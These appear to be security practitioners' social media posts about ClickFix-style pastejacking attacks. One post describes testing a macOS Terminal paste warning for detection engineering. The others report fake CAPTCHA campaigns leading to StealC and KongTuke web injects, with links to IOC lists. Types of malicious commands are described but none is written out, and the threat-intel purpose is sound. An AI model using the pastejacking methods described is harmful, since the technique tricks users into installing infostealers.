Has anyone been able to successfully replicate copying and pasting ClickFix/TerminalFix/*Fix commands into macOS Terminal to trigger this new-fangled malware warning? I have attempted numerous commands, from base64-encoded content to osascripts mimicking macOS infostealer prompts to cURL commands downloading remote content. I even replicated the command documented in the Toms Guide article using the same tool in the same browser and it ran flawlessly in Terminal with no popup. And yes, I’m running Tahoe 26.4 on an M3. I’d like to think this would be a useful ‘stop-and-think’ mitigation but I can’t even consistently trigger it. And, per usual, Apple is tight-lipped on HOW they are detecting malicious commands so it’s likely to remain a black box mitigation. And yeah, I get it, the end user can just click right through the warning via a sneaky social engineering prompt. My goal was to try and build out detection logic to ID when a user gets hit with a prompt so I can at least investigate what the user tried to do and dig deeper into the threat. Since theoretically the user won’t run the command, it won’t get logged in SIEM/EDR tools. I need to rely on other mechanisms for detecting the paste event.

https://www.tomsguide.com/computing/online-security/i-tried-apples-new-security-feature-in-macos-that-warns-you-about-potential-clickfix-attacks-and-windows-should-take-note?utm_source=flipboard&utm_medium=activitypub

#macos #clickfix #terminalfix #threatintel #pastejacking #detectionengineering #threathunting

2025-04-22 (Tuesday): Always fun to find the fake CAPTCHA pages with the #ClickFix style instructions trying to convince viewers to infect their computers with malware.

Saw #StealC from an infection today.

Indicators available at https://github.com/malware-traffic/indicators/blob/main/2025-04-22-IOCs-for-ClickFix-style-campaign-leading-to-StealC-infection.txt

#ClipboardHijacking #Pastejacking

Social media post I wrote for my employer on other platforms.

2025-04-04 (Friday): Injected #KongTuke script in pages from legitimate but compromised websites leads to fake #CAPTCHA style pages and #ClipboardHijacking (#pastejacking). These pages ask users to paste script into a Run window. Latest info at

Information from an infection run earlier today at https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2025-04-04-IOCs-forKongTuke-web-inject-leading-to-fake-CAPTHA-page.txt

Of note, we can find legitimate websites with the injected hashtag#KongTuke script by pivoting on the KongTuke domain in URLscan:

https://urlscan.io/search/#lancasternh.com